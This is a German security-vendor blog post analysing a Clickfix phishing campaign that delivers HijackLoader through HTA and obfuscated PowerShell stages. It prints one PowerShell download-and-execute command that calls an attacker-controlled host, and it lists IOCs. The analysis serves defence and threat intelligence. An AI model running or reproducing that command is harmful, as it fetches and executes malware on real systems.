• Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Seqrite Labs Blog
Vertrieb kontaktieren Angegriffen?
  • Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Startseite  /  Technische  / Dekonstruktion einer Cyber-Täuschung: Eine Analyse der Clickfix HijackLoader-Phishing-Kampagne 
Dekonstruktion einer Cyber-Täuschung: Eine Analyse der Clickfix HijackLoader-Phishing-Kampagne 
12 September 2025

Dekonstruktion einer Cyber-Täuschung: Eine Analyse der Clickfix HijackLoader-Phishing-Kampagne 

Geschrieben von Shrutirupa Banerjiee
Shrutirupa Banerjiee
Technische

Inhaltsverzeichnis 

  • Einführung 
    • Die wachsende Bedrohung durch Angriffslader 
    • Ziel dieses Blogs 
  • Technische Methodik und Analyse 
    • Erstzugriff und Social Engineering 
    • Mehrstufige Verschleierung und Deobfuskation 
    • Anti-Analyse-Techniken 
    • Die endgültige Nutzlast 
  • Fazit 
  • IOCs 
  • Schnelle Heilung \ Seqrite Schutz 
  • MITRE ATT&CK-Mapping 

 

Einführung 

Mit der Entwicklung von Cyberbedrohungen steht die endgültige Ausführung bösartiger Nutzdaten nicht mehr allein im Fokus der Cybersicherheitsbranche. Angriffslader haben sich zu einem kritischen Element moderner Angriffe entwickelt. Sie dienen als primärer Vektor für den Erstzugriff und ermöglichen die verdeckte Einschleusung komplexer Schadsoftware in ein Unternehmen. Im Gegensatz zu einfachen Nutzdaten werden Loader mit einem bestimmten Zweck entwickelt: Sie sollen Sicherheitsvorkehrungen umgehen, Persistenz gewährleisten und eine günstige Umgebung für die verborgene Ausführung der Schadsoftware im Endstadium schaffen. Dies macht sie zu einer größeren und relevanteren Bedrohung, die eine gezielte Analyse erfordert. 

Wir haben in letzter Zeit einen Anstieg der HijackLoader Malware. Es zuerst entstanden in der zweiten Hälfte des Jahres 2023 und schnell gewonnen Aufmerksamkeit aufgrund seiner Fähigkeit, Nutzlasten zu liefern und seiner interessanten Techniken zum Laden und Ausführen dieser. Es erscheint meist als Malware-as-a-Service, Die seit beobachtet hauptsächlich in finanziell motivierten Kampagnen weltweit.  

HijackLoader wurde verbreitet durch gefälschte Installateure, SEO-vergiftet Webseiten, Malvertising und Raubkopien von Software/Filmportalen, was für eine breite und opportunistische Opferbasis sorgt. 

Seit Juni 2025 beobachten wir Angreifer, die Clickfix verwenden. Dabei werden ahnungslose Opfer dazu gebracht, schädliche MSI-Installationsprogramme herunterzuladen, die wiederum zur Ausführung von HijackLoader führen. DeerStealer wurde als letzte ausführbare Datei auf den Computer des Opfers heruntergeladen.  

Kürzlich wurde außerdem beobachtet, dass TAG-150 mit CastleLoader/CastleBot aufgetaucht ist und gleichzeitig externe Dienste wie HijackLoader als Teil seines umfassenderen Malware-as-a-Service-Ökosystems nutzt. 

HijackLoader liefert häufig Stealer und RATs während es seine Fähigkeiten kontinuierlich verfeinert. Es ist besonders berüchtigt für fortgeschrittene Ausweichtechniken wie: 

  • Prozessdoppelgänge mit abgewickelten Abschnitten 
  • Aushängen von System-DLLs 
  • Direkte Systemaufrufe unter WOW64 
  • Call-Stack-Spoofing 
  • Anti-VM-Prüfungen 

Seit seiner Entdeckung hat sich HijackLoader kontinuierlich weiterentwickelt und stellt eine anhaltende und zunehmende Bedrohung für verschiedene Branchen dar. Daher ist es für Unternehmen von entscheidender Bedeutung, ein kontinuierliches Monitoring solcher Loader einzurichten und aufrechtzuerhalten, um das Risiko komplexer, mehrstufiger Angriffe zu minimieren. 

Infektionskette 

Infektionskette

Technische Übersicht 

Der Erstzugriff beginnt mit einem CAPTCHA-basierte Social-Engineering-Phishing-Kampagne, die wir als Clickfix identifiziert haben (diese Technik wurde auch im Juni 2025 von Angreifern verwendet). 

Abb. 1: CAPTCHA-basierte Phishing-Seite für Social Engineering
Abb. 2: HTA-Dropper-Datei für die Erstausführung

 Diese HTA-Datei dient als erster Downloader und führt zur Ausführung einer PowerShell-Datei.   

Abb. 3: Erstes PowerShell Loader-Skript

Nach der Dekodierung der oben Base64-kodierten Zeichenfolge haben wir ein weiteres PowerShell-Skript erhalten, wie unten gezeigt. 

Abb. 4: Verschleiertes PowerShell-Skript der ersten Stufe

Das oben dekodierte PowerShell-Skript ist stark verschleiert und stellt eine erhebliche Herausforderung für die statische Analyse und signaturbasierte Erkennung dar. Anstatt lesbare Zeichenfolgen und Variablen zu verwenden, erstellt es Befehle und Werte dynamisch durch komplexe mathematische Operationen und die Rekonstruktion von Zeichenfolgen aus Zeichenarrays. 

Beim Auflösen der obigen Nutzlast sehen wir, dass sie in den folgenden Befehl dekodiert wird, der zwar immer noch unlesbar ist, aber vollständig deobfuskiert werden kann. 

Abb. 5: Deobfuskation der verschleierten Nutzlast der ersten Stufe

Nach der vollständigen Deobfuskierung sehen wir, dass das Skript versucht, eine Verbindung zu einer URL herzustellen, um eine nachfolgende Datei herunterzuladen.  

iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

Wenn dieses Skript in einem Debugger ausgeführt wird, gibt es einen Fehler zurück, der darauf hinweist, dass keine Verbindung zur URL hergestellt werden kann.  

Abb. 6: Debugger-Ansicht der fehlgeschlagenen C2-Verbindung

Die Datei samie-bower.mp3 ist ein weiteres PowerShell-Skript, das mit über 18,000 Zeilen stark verschleiert ist und die nächste Stufe des Loaders darstellt. 

Abb. 7: Mainstage PowerShell Loader (samie_bower.mp3)

Durch Debuggen stellen wir fest, dass diese PowerShell-Datei zahlreiche Anti-VM Überprüfungen, einschließlich der Überprüfung der Anzahl der laufenden Prozesse und der Durchführung von Änderungen an den Registrierungsschlüsseln.  

Abb. 8: Anti-Virtual Machine- und Sandbox-Evasion-Checks

Diese Kontrollen scheinen sich speziell an VirtualBox-Kennungen um festzustellen, ob das Skript in einer virtualisierten Umgebung ausgeführt wird. 

Bei der Analyse des Skripts haben wir festgestellt, dass sich die endgültige Nutzlast in den letzten Zeilen befindet. Dort liefert der anfänglich verschleierte Loader den letzten bösartigen Befehl. 

Abb. 9: Endgültige Ausführung

 Die obige unsinnige Variablendeklaration wurde behoben. Bei der Ausführung führt sie eine Base64-Dekodierung, XOR-Operationen und zusätzliche Entschlüsselungsroutinen durch, bevor ein weiteres PowerShell-Skript geladen wird, das wahrscheinlich die PE-Datei einfügt.  

Abb. 10: Mittleres PowerShell-Skript für PE-Injektion
Abb. 11: Base64-kodierte eingebettete PE-Nutzlast

 

Beim Dekodieren dieser Datei wird eine eingebettete PE-Datei angezeigt, die an ihrem MZ-Header. 

Abb. 12: Dekodierte PE-Datei mit MZ-Header

Diese PE-Datei ist eine stark gepackte Ausführbare .NET-Datei. 

Abb. 13: Gepackte ausführbare .NET-Nutzlast

Die ausführbare Nutzlast lädt eine erhebliche Menge Code, der wahrscheinlich aus dem Ressourcenabschnitt extrahiert wurde. 

Abb. 14: In-Memory-Entpacken der ausführbaren .NET-Datei

Nach dem Entpacken scheint die ausführbare Nutzlast eine DLL-Datei zu laden. 

Abb. 15: Geschützte DLL im Speicher geladen

Diese DLL-Datei ist außerdem geschützt, wahrscheinlich um Reverse Engineering und Analysen zu verhindern. 

Abb. 16: DLL-Schutzindikatoren

HijackLoader verwendet seit jeher einen mehrstufigen Prozess, der eine ausführbare Datei gefolgt von einer DLL umfasst. Diese letzte Phase des Loaders versucht, eine Verbindung zu einem C2-Server herzustellen, von dem aus ein Infostealer-Malware wird heruntergeladen. In diesem Fall versucht die Malware, eine Verbindung zur folgenden URL herzustellen. 

Abb. 17: Letzter Verbindungsversuch zum C2-Server

Obwohl dieser C2 nicht mehr erreichbar ist, entspricht der Verbindungsversuch dem Verhalten von NekoStealer-Malware. Dieser HijackLoader war am Herunterladen verschiedener Stealer-Malware beteiligt, darunter auch Lumma. 

Fazit 

Um sich erfolgreich gegen hochentwickelte Loader wie HijackLoader zu verteidigen, muss der Fokus von statischen Payloads im Endstadium auf deren dynamische und sich ständig weiterentwickelnde Verbreitungsmechanismen verlagert werden. Indem Unternehmen sich auf die Erkennung des ersten Zugriffs und der Zwischenstadien der Verschleierung konzentrieren, können sie eine widerstandsfähigere Abwehr gegen diese hartnäckige Bedrohung aufbauen. Ebenso wichtig ist ein proaktiver Ansatz auf allen Ebenen, anstatt sich nur auf den ersten Zugriff oder die endgültige Payload zu konzentrieren. In den Zwischenebenen nehmen Angreifer häufig die wichtigsten Änderungen vor, um die erfolgreiche Verbreitung von Malware zu ermöglichen. 

IOCs: 

  • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
  • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
  • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
  • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
  • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
  • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
  • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
  • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
  • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
  • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
  • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
  • 91 [.] 212 [.] 166 [.] 51 
  • 37[.]27[.]165[.]65:1477 
  • cosi[.]com[.]ar 
  • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
  • hxxp[:]//77[.]91[.]101[.]66/ 

Schnelle Heilung \ Seqrite Schutz: 

  • Script.Trojan.49900.GC 
  • Loader.StealerDropperCiR 
  • Trojan.InfoStealerCiR 
  • Trojan.Agent 
  • BDS/511 

MITRE-Angriff: 

Taktik  Technik-ID  Technikname 
Erster Zugriff  T1566.002  Phishing: Spearphishing-Link (CAPTCHA-Phishing-Seite) 
T1189  Drive-by-Kompromittierung (Malvertising, SEO-Poisoning, gefälschte Installationsprogramme) 
Ausführung  T1059.001  Befehls- und Skriptinterpreter: PowerShell 
Verteidigungsflucht  T1027  Verschleierte Dateien oder Informationen (mehrstufig verschleierte Skripte) 
T1140  Dateien oder Informationen deobfuscate/dekodieren (Base64, XOR-Dekodierung) 
T1562.001  Abwehrmaßnahmen beeinträchtigen: Tools deaktivieren oder ändern (DLLs aushängen) 
T1070.004  Indikatorentfernung: Dateilöschung (wird wahrscheinlich in Staged Loadern verwendet) 
T1211  Ausnutzung zur Umgehung der Verteidigung (direkte Systemaufrufe unter WOW64) 
T1036  Masquerading (gefälschte Erweiterungen wie .mp3 für PowerShell-Skripte) 
Bewertung  T1082  Systeminformationsermittlung (VM-Prüfungen, Registrierungsabfragen) 
T1497.001  Virtualisierung/Sandbox-Umgehung: Systemprüfungen 
Beharrlichkeit  T1547.001  Autostart-Ausführung beim Booten oder Anmelden: Registrierungsschlüssel ausführen (Registrierungsmanipulation) 
Persistenz/Berechtigungs-Esc.  T1055  Prozessinjektion (PE-Injektionsroutinen) 
Befehl und Kontrolle (C2)  T1071.001  Anwendungsschichtprotokoll: Webprotokolle (HTTP/HTTPS C2-Verkehr) 
T1105  Ingress Tool Transfer (Herunterladen zusätzlicher Nutzdaten) 
Wirkung / Sammlung  T1056 / T1005  Eingabeerfassung/Daten vom lokalen System (Info-Stealer-Funktionalität der endgültigen Nutzlast) 

 

Autoren: 

Niraj Lazarus Makasare 

Shrutirupa Banerjiee 

 VORHERIGER ARTIKELEcholeak – Senden Sie eine Eingabeaufforderung, extrahieren Sie das Geheimnis aus der Copilot-KI! (CVE-20 …
NÄCHSTER ARTIKEL  Warum Regional- und Genossenschaftsbanken nicht länger auf Altlasten setzen können...
Shrutirupa Banerjiee

Über Shrutirupa Banerjiee

Ich bin Shrutirupa und arbeite derzeit als Senior Security Researcher bei SEQRITE LABs. Mit fast 5 Jahren Erfahrung habe ich meinen Schwerpunkt von Blockchain verlagert...

Artikel von Shrutirupa Banerjiee »

Verwandte Artikel

  • Hinter der Rückerstattung: Von GST-Phishing zu Remcos RAT durch eine mehrstufige .NET-Infektionskette

    Hinter der Rückerstattung: Von GST-Phishing zu Remcos RAT durch eine mehrstufige .NET-Infektionskette

    Juli 17, 2026
  • Operation ShadowRecruit: Eine Malware-Kampagne mit Rekrutierungsthema, die ControlR und Google Sheets nutzt, um indische Arbeitssuchende ins Visier zu nehmen

    Juli 14, 2026
  • Von der Rechnung zu AnyDesk: Aufdeckung einer Phishing-Kampagne gegen russische Luft- und Raumfahrtorganisationen  

    Juli 7, 2026
Ausgewählte Autoren
  • Seqrite
    Seqrite

    Seqrite ist ein führender Anbieter von Cybersicherheitslösungen für Unternehmen. Mit dem Fokus auf...

    Lesen Sie weitere Artikel von Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ich bin eine leidenschaftliche Autorin, die gerne Inhalte über neue Technologien verfasst und...

    Lesen Sie weitere Artikel von Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ich bin ein leidenschaftlicher Cybersicherheits-Enthusiast und engagierter Autor. Mit einem besonderen Talent...

    Lesen Sie weitere Artikel von Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar ist der gemeinsame Geschäftsführer von Quick Heal Technologies ...

    Lesen Sie weitere Artikel von Sanjay Katkar
Themen
geeignet (25) Cyber ​​Attacke (36) Cyber-Angriffe (58) Cyberangriff (16) Cyber-Angriffe (15) Internet-Sicherheit (340) Internet-Sicherheit (34) Cyber-Bedrohung (33) Cyber-Bedrohungen (51) Datenmissbrauch (56) Datenverstöße (29) Data Loss (28) Verhinderung von Datenverlust (34) data privacy (16) Datenschutz gelesen. (34) Datensicherheit (19) DLP (50) DPDP (14) DPDPA (17) Verschlüsselung (16) Endpoint-Sicherheit (112) Unternehmenssicherheit (19) Ausnutzen (13) Datenschutz (14) Malware (76) Malware-Analyse (14) Malware-Angriff (23) MDM (27) Microsoft (15) MITRE ATT & CK (13) Netzwerksicherheit (26) Phishing (30) Ransomware (69) Ransomware-Angriff (31) Ransomware-Angriffe (31) Ransomware-Schutz (16) Seqrite (41) Seqrite Verschlüsselung (27) Seqrite EPS (33) Seqrite Services (16) Bedrohungserkennung (13) Threat IntelLigence (20) UTM (34) Verwundbarkeit (16) null vertrauen (13)
Seqrite Labs

Führender Anbieter von IT-Sicherheitslösungen für Unternehmen, der die Sicherheit von Endpunkten, Daten und Netzwerken mit erstklassigen Lösungen zur Bedrohungsprävention, -erkennung und -reaktion weltweit vereinfacht.

Lesen Sie mehr über Seqrite

Folge uns:

Abonniere unseren Newsletter

Bleiben Sie über die neuesten Trends und Erkenntnisse zur Cybersicherheit auf dem Laufenden.

Laden
Produkte & Angebote
  • Wolke
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • On Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Plattform
  • Malware Analysis Platform
  • Mikrounternehmen
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersicherheit & Data Privacy Aufmerksamkeit
Ressourcen
  • Blogs
  • Whitepapers
  • Datenblätter
  • Bedrohungsberichte
  • Handbücher
  • PoV
  • Ohne fundierte Kenntnisse zu Data Privacy
  • DPDP-Dialoge
  • Einhaltung von Richtlinien
  • EULA
  • GoDeep.AI
  • SIA
  • Stunde der Privatsphäre
Kontakt
  • Sitz der Gesellschaft
  • Reden wir über Cybersicherheit
Unterstützung
  • Technischer Support
  • Software herunterladen
  • Offline-Updater
  • Firmware-Upgrades
  • Upgrades, Modernisierungen & TIPs
  • Produktdokumentation
Über uns
  • Über uns Seqrite
  • Leadership
  • Auszeichnungen & Anerkennungen
  • Newsroom
Partner
  • Partner Programm
  • Partner finden
  • PARTNER WERDEN
  • Seqrite Zertifizierungsanforderungen

© 2026 Quick Heal Technologies Ltd.

Sitemap Datenschutzrichtlinien Rechtliche Hinweise Cookie-Richtlinien Nutzungsbedingungen